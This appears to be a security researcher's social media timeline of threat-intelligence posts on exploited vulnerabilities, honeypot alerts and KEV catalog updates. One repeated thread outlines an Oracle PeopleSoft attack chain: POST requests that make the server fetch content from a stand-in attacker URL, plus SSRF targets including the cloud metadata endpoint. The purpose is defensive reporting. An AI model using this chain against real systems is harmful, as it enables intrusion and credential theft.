Joined June 2009
- Tweets 3,574
- Following 806
- Followers 21,033
- Likes 14,511
371 Photos and videos
🚨 KEVIntel Honeypot Alert
KEVIntel observed activity targeting Oracle PeopleSoft via:
POST /PSIGW/HttpListeningConnector
This is one of the key PeopleSoft endpoints highlighted by Google Mandiant in its reporting on CVE-2026-35273 exploitation by UNC6240 / ShinyHunters.
The activity is consistent with exploitation attempts against the same Environment Management / Integration Broker attack surface described in that campaign.
At this stage, we are treating the activity as consistent with reported CVE-2026-35273 targeting, not as confirmed attribution to the same threat actor.
We are continuing to track this activity across KEVIntel sensors.
🚨 ShinyHunters is exploiting an Oracle PeopleSoft vulnerability (CVE-2026-35273) as part of an extortion campaign targeting higher education.
Read the full analysis, and get IOCs and remediation guidance to stay ahead of the threat: goo.gle/4e52jOz
2
1
3
1,148
1
1
2
234
Based on KEVIntel honeypot logs and Mandiant report, I believe this is potentially the CVE-2026-35273 chain used, but not 100% on all details.
1 Attacker sends POST /PSEMHUB/hub with environment-management actions (updateEnvironment, fetchEnvironment, syncEnvironment) and a attacker-controlled sourceURL (http://attacker_ip:9999/hub_update).
1.1 The hub fetches and processes environment metadata/updates from attacker-controlled sourceURL.
1.2 Malicious content is staged on disk under PSEMHUB.war/envmetadata/ (transactions, environment XML).
1.3 RCE follows when that content is processed. Mandiant observed XMLDecoder abuse via envmetadata/data/environment/*.xml on app restart, plus unexpected .jsp webshells.
2. Integration Broker SSRF. POST /PSIGW/HttpListeningConnector with sourceURL targets including:
- WebLogic admin console (127[.]0.0.1:7001/console)
- Internal PeopleSoft services (127[.]0.0.1:51500/pspc/services/AdminService)
- Cloud metadata endpoint (169[.]254.169.254)
148
Based on KEVIntel honeypot logs and Mandiant report, I believe this is the CVE-2026-35273 chain used, but not 100% on all details.
1 Attacker sends POST /PSEMHUB/hub with environment-management actions (updateEnvironment, fetchEnvironment, syncEnvironment) and a attacker-controlled remote sourceURL (http://attacker_ip:9999/hub_update).
1.1 The hub fetches and processes environment metadata/updates from remote attacker-controlled sourceURL.
1.2 Malicious content is staged on disk under PSEMHUB.war/envmetadata/ (transactions, environment XML).
1.3 RCE follows when that content is processed. Mandiant observed XMLDecoder abuse via envmetadata/data/environment/*.xml on app restart, plus unexpected .jsp webshells.
2. Integration Broker SSRF. POST /PSIGW/HttpListeningConnector with sourceURL targets including:
- WebLogic admin console (127[.]0.0.1:7001/console)
- Internal PeopleSoft services (127[.]0.0.1:51500/pspc/services/AdminService)
- Cloud metadata endpoint (169[.]254.169.254)
🚨 KEVIntel Honeypot Alert
KEVIntel observed activity targeting Oracle PeopleSoft via:
POST /PSIGW/HttpListeningConnector
This is one of the key PeopleSoft endpoints highlighted by Google Mandiant in its reporting on CVE-2026-35273 exploitation by UNC6240 / ShinyHunters.
The activity is consistent with exploitation attempts against the same Environment Management / Integration Broker attack surface described in that campaign.
At this stage, we are treating the activity as consistent with reported CVE-2026-35273 targeting, not as confirmed attribution to the same threat actor.
We are continuing to track this activity across KEVIntel sensors.
1
3
393
Jun 12
This week at KEVIntel:
• 35 new Known Exploited Vulnerabilities added
• 30 beyond CISA KEV
• 5 listed in CISA KEV
• 10 hours faster than CISA KEV on average
• 9 different KEVs exploited across our honeypot sensors
• 236 verified exploitation attempts from 15 unique attacker IPs
We also detected exploitation of Fortinet FortiSandbox CVE-2026-39808 in the wild for the first time across our telemetry.
CISA KEV is the baseline. KEVIntel helps teams go further with earlier signals, proprietary sensor telemetry, and exploited vulnerability intelligence beyond the official catalog.
And we're just getting warm!
325
Jun 11
Starting to see in the wild exploitation ramp up for Critical Ivanti Sentry Unauth RCE (CVE-2026-10520)
Some example payloads being used by attackers:
1
4
419
Jun 10
3
449
Ryan Dewhurst retweeted
Jun 10
We're back - analyzing CVE-2026-10520, a Pre-Auth RCE in Ivanti's confusingly named Sentry product.
Enjoy!
labs.watchtowr.com/more-evid…
2
34
100
10,048
Jun 9
Jun 9
🛡️ We added Arista EOS vulnerability CVE-2026-7473, Google Chromium V8 vulnerability CVE-2026-11645, & Cisco Catalyst vulnerability CVE-2026-20245 to our KEV Catalog. Visit go.dhs.gov/Z3Q & apply mitigations to protect your org from cyberattacks. #Cybersecurity #InfoSec
414
Ryan Dewhurst retweeted
sqlmap shipped v0.1 on 25 July 2006. Almost 20 years later, it finally has a real home, and a face. Meet the tarsier, sqlmap.org
20
62
4,128
Jun 9
CVE-2026-50751 was added to KEVIntel 6 hours before CISA KEV
Jun 8
Exploited in the wild since May 7th 2026!
Checkpoint User Authentication Bypass in VPN Remote Access and Mobile Access - CVE-2026-50751
Financially motivated, uses Qilin ransomware.
IoCs included.
kevintel.com/CVE-2026-50751
blog.checkpoint.com/security…
3
876
Ryan Dewhurst retweeted
Jun 8
This vulnerability has been exploited in the wild since at least May 7
decipher.sc/2026/06/08/check…
3
7
762
Jun 8
New private PoC added for CVE-2026-8054.
Unauthenticated SQL Injection in the dotCMS Publish Audit API.
Affected endpoints:
POST /api/auditPublishing/getAll
POST /api/auditPublishing/get
Affected versions:
dotCMS Core 25.11.04-1 through 26.04.28-02
Fixed:
26.04.28-03
26.05.06-01
LTS releases are not affected.
We have not yet observed exploitation against KEVIntel honeypots, but with a private PoC now available, exploitation attempts are likely only a matter of time.
Available now for KEVIntel Pro users:
kevintel.com/CVE-2026-8054
1
5
23
2,829
Jun 8
Exploited in the wild since May 7th 2026!
Checkpoint User Authentication Bypass in VPN Remote Access and Mobile Access - CVE-2026-50751
Financially motivated, uses Qilin ransomware.
IoCs included.
kevintel.com/CVE-2026-50751
blog.checkpoint.com/security…
1
5
1,356
Jun 5
I have "Boat party" in my calendar for today but can't remember why, where, or who with 🤦‍♂️
3
2
1,147